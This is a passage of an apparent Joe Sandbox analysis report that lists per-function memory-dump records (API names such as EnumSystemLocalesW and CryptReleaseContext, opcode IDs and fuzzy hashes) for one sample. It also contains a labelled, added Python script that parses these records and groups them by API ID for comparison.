                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                          • String ID: w#G!
                                          • API String ID: 1663032902-519468572
                                          • Opcode ID: 4154f234dcdf92831b711d7ae33e647d005d3131946179e32f1e4e90bfbf53a9
                                          • Instruction ID: fb1727349fd640d0a32df46ef4e1fcbf612680f07567137bea711adfcc81da36
                                          • Opcode Fuzzy Hash: 4154f234dcdf92831b711d7ae33e647d005d3131946179e32f1e4e90bfbf53a9
                                          • Instruction Fuzzy Hash: E121C272510206ABEB25EF24CD46BBA77ACEB49310F10C1BAFD09C6151EB74AD40CB90
                                          APIs
                                            • Part of subcall function 00A6C20B: EnterCriticalSection.KERNEL32(?,?,00A6D038,00000000,00ACCCC0,0000000C,00A6CFF3,?,?,?,00A74D3C,?,?,00A7442F,00000001,00000364), ref: 00A6C21A
                                          • EnumSystemLocalesW.KERNEL32(00A72BEA,00000001,00ACCDC0,0000000C), ref: 00A72C68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID: w#G!
                                          • API String ID: 1272433827-519468572
                                          • Opcode ID: c600d957305df9108cb57610f85637d6a387160300b1412480b1a6aad1091294
                                          • Instruction ID: 33b6afda7285a1d9dff5958e75ce386c9f352e709c8f7aa98d6d8f4d986bec59
                                          • Opcode Fuzzy Hash: c600d957305df9108cb57610f85637d6a387160300b1412480b1a6aad1091294
                                          • Instruction Fuzzy Hash: A8F04F36A50300EFDB00EFB8DD46F9E37F0EB04720F118216F525DB2A1DA748A868B40
                                          APIs
                                          • ___crtGetLocaleInfoEx.LIBCPMT ref: 00A3C056
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: InfoLocale___crt
                                          • String ID: 2
                                          • API String ID: 3761071962-450215437
                                          • Opcode ID: 94d9ae317dddcc1a3e64a75f7081b7145ae45ece0e556ca61f5891539d9c8b25
                                          • Instruction ID: d8afb8273b8a7b437f65bb50416eb23db2d62163f58e341d623fd9fe6a7871d5
                                          • Opcode Fuzzy Hash: 94d9ae317dddcc1a3e64a75f7081b7145ae45ece0e556ca61f5891539d9c8b25
                                          • Instruction Fuzzy Hash: 4AE06569D51258FAEB089B849E87BAD727CDB0136DF108194F11166081D6F59F84D262
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: b16afecafc5fbf40f38c843a8b405daedfd8270b5dcc852fa1e318ef58f18ee0
                                          • Instruction ID: 20d06ac74dedf5ace014f6703c7b9dec0ff25356e32a822e88e00257dc0dfffe
                                          • Opcode Fuzzy Hash: b16afecafc5fbf40f38c843a8b405daedfd8270b5dcc852fa1e318ef58f18ee0
                                          • Instruction Fuzzy Hash: 97A25B74A04118DFCB18CF98D5A0ABDB7F1FB48310F20448DE596AB392C635AE92DF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: a8a2ca29e312da0c227739b8f1d5d1f78d6b1f37dee70a1ee052622ae5719d4c
                                          • Instruction ID: 41337acd7d6faff4eac98ee484e5bce57a9ca8fffa28ebed7c493350dff9618d
                                          • Opcode Fuzzy Hash: a8a2ca29e312da0c227739b8f1d5d1f78d6b1f37dee70a1ee052622ae5719d4c
                                          • Instruction Fuzzy Hash: C532CFB1A00248DFCB14DF68C984BAEBBF5BF88304F194159E90A9B391D774ED45CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: d4c60202d42dced9fa20d9044640e6d913da5dc76eb19ddd9eaf0ff4bdd5d056
                                          • Instruction ID: b9359b236a99b15536753d184b38c75a012cd0144544b1455605b26617990051
                                          • Opcode Fuzzy Hash: d4c60202d42dced9fa20d9044640e6d913da5dc76eb19ddd9eaf0ff4bdd5d056
                                          • Instruction Fuzzy Hash: 34123775E002199FCF18CF98D894AEEBBB6FF88310F144129E916AB355DB31A945CF90
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • EnumSystemLocalesW.KERNEL32(00A7E8F5,00000001,00000000,?,00A70C69,?,00A7EF22,00000000,?,?,?), ref: 00A7E83F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: d60e6b997b369455737eaaaa5fe17629404a6d35b18ec61eef77254d371d5f6c
                                          • Instruction ID: 08409859fe7db4f71031004baac00e66c359819dd90f8f91b44064ce5ae0b995
                                          • Opcode Fuzzy Hash: d60e6b997b369455737eaaaa5fe17629404a6d35b18ec61eef77254d371d5f6c
                                          • Instruction Fuzzy Hash: D711E9376007019FDB18DF39CCA567ABB91FF84358B14C56DE58B47A40D7716942C740
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A7EB13,00000000,00000000,?), ref: 00A7EDA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale_abort_free
                                          • String ID:
                                          • API String ID: 2692324296-0
                                          • Opcode ID: 73418e09592836417a5e4e8c6cc27dff42300abcb3f747fe3df19e539477f68a
                                          • Instruction ID: c9e52f9e773aba594e756770111ab08842b46ea406b950d09f748264c5ebe71e
                                          • Opcode Fuzzy Hash: 73418e09592836417a5e4e8c6cc27dff42300abcb3f747fe3df19e539477f68a
                                          • Instruction Fuzzy Hash: 33F0F433A00115BFDB38DB64CC05BBA7768EB44354F14C4BAEC0DA3141EA30BE5286D0
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • EnumSystemLocalesW.KERNEL32(00A7EB45,00000001,?,?,00A70C69,?,00A7EEE6,00A70C69,?,?,?,?,?,00A70C69,?,?), ref: 00A7E8B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: 30614ef029d9742594a72fa2eef45f8831a127e148b5eda5efc70dde084b4c7a
                                          • Instruction ID: 7a12b29a3452f56779e6df457e0e6f586c9886f30653abb38b0f1c7f42fabe1e
                                          • Opcode Fuzzy Hash: 30614ef029d9742594a72fa2eef45f8831a127e148b5eda5efc70dde084b4c7a
                                          • Instruction Fuzzy Hash: BDF0C2373007046FDB14DF399C91A6A7B95EF85368B15C4ADF94A8B690D7B19C428640
                                          APIs
                                            • Part of subcall function 00A7437A: GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                            • Part of subcall function 00A7437A: _free.LIBCMT ref: 00A743B1
                                            • Part of subcall function 00A7437A: SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                            • Part of subcall function 00A7437A: _abort.LIBCMT ref: 00A743F8
                                          • EnumSystemLocalesW.KERNEL32(00A7E6D9,00000001,?,?,?,00A7EF44,00A70C69,?,?,?,?,?,00A70C69,?,?,?), ref: 00A7E7B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: bb114a9dc185d4008b824002547053f2836ef3fa504bbd964c5b07bc1e4d6b54
                                          • Instruction ID: 0f2ae6f9bc2033aacc4d1e05160b460e64aa9298dbebc95003978e1551b5a10f
                                          • Opcode Fuzzy Hash: bb114a9dc185d4008b824002547053f2836ef3fa504bbd964c5b07bc1e4d6b54
                                          • Instruction Fuzzy Hash: 55F0A03A300205A7DB08EF7ADC5566A7F94EF85764B06C09AEA098B260D6719942C750
                                          APIs
                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A14733
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ContextCryptRelease
                                          • String ID:
                                          • API String ID: 829835001-0
                                          • Opcode ID: f15f30c331af8bcf339cadde146ed7428204c53037e49c2466547f679a11d25c
                                          • Instruction ID: 5625fd9e2e743bbb89366f76f71e5a05786167a5d0e945f863c46ad377747065
                                          • Opcode Fuzzy Hash: f15f30c331af8bcf339cadde146ed7428204c53037e49c2466547f679a11d25c
                                          • Instruction Fuzzy Hash: 32D05E7176432152D6305B589C89F9BBADC5F56B01F088819B688E62C0DBB0D884C7A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __onexit
                                          • String ID: w#G!
                                          • API String ID: 1448380652-519468572
                                          • Opcode ID: 771cca5c300fbd0a0203159b3ae3264039ea938ea82e8010af8195bac59dcc4f
                                          • Instruction ID: 2f1eb6169924826e256183d4391a9c4612cee7042558d60a5608590d702fad45
                                          • Opcode Fuzzy Hash: 771cca5c300fbd0a0203159b3ae3264039ea938ea82e8010af8195bac59dcc4f
                                          • Instruction Fuzzy Hash: BEB17F60614384EDE701DBE0EC1AF1A3BA2EB42708F55847DEA405F2E2DBF94906CB95
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: 4ee56c522ad2d5f344da8e7a6e3113081d42b570d4fd96bad200d2ceb4fa7f7f
                                          • Instruction ID: badf0cf4bc29a7d5cd5a6b3198ca0ea29900fa05726a5284ce919fab586e6ac5
                                          • Opcode Fuzzy Hash: 4ee56c522ad2d5f344da8e7a6e3113081d42b570d4fd96bad200d2ceb4fa7f7f
                                          • Instruction Fuzzy Hash: 68616FB1A0061A9FDB18CF69C5817EEF7F9FB48320F044669D959A7341DB70A905CBD0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: d22fe43a0b2a6e25304ba946d7152cc28c891ac38a5aaed6f15e31d94038b690
                                          • Instruction ID: b0cafc3cfef73d13bf0318bf0f31f3e8c532727e7a2004ccfd86420f16ce62ba
                                          • Opcode Fuzzy Hash: d22fe43a0b2a6e25304ba946d7152cc28c891ac38a5aaed6f15e31d94038b690
                                          • Instruction Fuzzy Hash: BD329C78A0020ADFCF18CF98C995ABEBBB5FF95304F244169D94197345E732AE46CB90
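The records above, one per function, each carry the same three parts (a Memory Dump Source, a Joe Sandbox IDA Plugin snapshot and a Similarity block with API ID, opcode ID and fuzzy hashes), which makes them easier to compare across samples as a table than as a page of bullets. The parser below is an added example, not part of this Joe Sandbox report or of Joe Security's tooling. Its sample input is constructed from two of the records on this page; it assumes the "Download File" text fused onto each Associated line is link residue from the HTML export, and that in a clean export the Opcode ID and Opcode Fuzzy Hash of a record are always equal, as they are in every record here.

```python
"""Parse the per-function Memory Dump Source / Similarity records of a
Joe Sandbox report into dicts, then group them by API ID."""
import re
from collections import defaultdict

# Constructed sample: two records in the layout used on this page, values copied
# from the report. The trailing "Download File" is assumed to be link residue.
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
• Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
Similarity
• API ID: __onexit
• String ID: w#G!
• API String ID: 1448380652-519468572
• Opcode ID: 771cca5c300fbd0a0203159b3ae3264039ea938ea82e8010af8195bac59dcc4f
• Instruction ID: 2f1eb6169924826e256183d4391a9c4612cee7042558d60a5608590d702fad45
• Opcode Fuzzy Hash: 771cca5c300fbd0a0203159b3ae3264039ea938ea82e8010af8195bac59dcc4f
• Instruction Fuzzy Hash: BEB17F60614384EDE701DBE0EC1AF1A3BA2EB42708F55847DEA405F2E2DBF94906CB95
Strings
Memory Dump Source
• Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
• Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: d22fe43a0b2a6e25304ba946d7152cc28c891ac38a5aaed6f15e31d94038b690
• Instruction ID: b0cafc3cfef73d13bf0318bf0f31f3e8c532727e7a2004ccfd86420f16ce62ba
• Opcode Fuzzy Hash: d22fe43a0b2a6e25304ba946d7152cc28c891ac38a5aaed6f15e31d94038b690
• Instruction Fuzzy Hash: BD329C78A0020ADFCF18CF98C995ABEBBB5FF95304F244169D94197345E732AE46CB90
"""

# "• Key: value"; the non-greedy key stops at the first colon so that
# "Source File: x.sdmp, Offset: 009B0000, based on PE: true" keeps its value whole.
FIELD_RE = re.compile(r"^\s*[•*-]?\s*([A-Za-z_ ]+?):\s*(.*)$")
LINK_RESIDUE = "Download File"


def parse_records(text):
    """Return one dict per record. A record starts at each 'Memory Dump Source'
    heading; bare section headings ('Similarity', 'Strings', 'Joe Sandbox IDA
    Plugin') carry no value and are skipped; 'Associated' repeats, so it is a list."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {"Associated": []}
            records.append(current)
            continue
        if current is None or not line:
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if value.endswith(LINK_RESIDUE):
            value = value[: -len(LINK_RESIDUE)].rstrip()
        if key == "Associated":
            current["Associated"].append(value)
        elif key == "Source File":
            # split "name, Offset: X, based on PE: true" into three fields
            parts = [p.strip() for p in value.split(",")]
            current["Source File"] = parts[0]
            for part in parts[1:]:
                k, _, v = part.partition(":")
                current[k.strip()] = v.strip()
        else:
            current[key] = value
    return records


def by_api(records):
    """Map each API ID (or '(no API)') to the instruction fuzzy hashes of the
    functions that reference it; this is the view to diff against another sample."""
    table = defaultdict(list)
    for r in records:
        table[r.get("API ID") or "(no API)"].append(r.get("Instruction Fuzzy Hash"))
    return dict(table)


def check_consistency(records):
    """Return the Opcode IDs of records that look mangled: Opcode ID differing
    from Opcode Fuzzy Hash, or a dump not marked 'based on PE: true'."""
    return [r.get("Opcode ID") for r in records
            if r.get("Opcode ID") != r.get("Opcode Fuzzy Hash")
            or r.get("based on PE") != "true"]


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for api, hashes in by_api(recs).items():
        print(f"{api:20s} {len(hashes)} function(s): {hashes}")
    print("inconsistent records:", check_consistency(recs))
```

Run the script on the text of an exported report to get the grouped view; records with an empty API ID (the majority on this page) land under "(no API)" and are the ones that need the fuzzy hashes rather than imports to match against a second sample.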
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e42a552762eb44b643350524122c0e39b165d975ecbcbd2b12dcc95a2a2ae59
                                          • Instruction ID: 455a6d33a4d5a70eb43adc790ddb685e1a61e18f9f812d36aa88ac82cdba65bc
                                          • Opcode Fuzzy Hash: 3e42a552762eb44b643350524122c0e39b165d975ecbcbd2b12dcc95a2a2ae59
                                          • Instruction Fuzzy Hash: 4B52AE76D106199FDB14CFA8C881AAEB7F1FF4C314F5681A9D919AB302C634BA41CF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
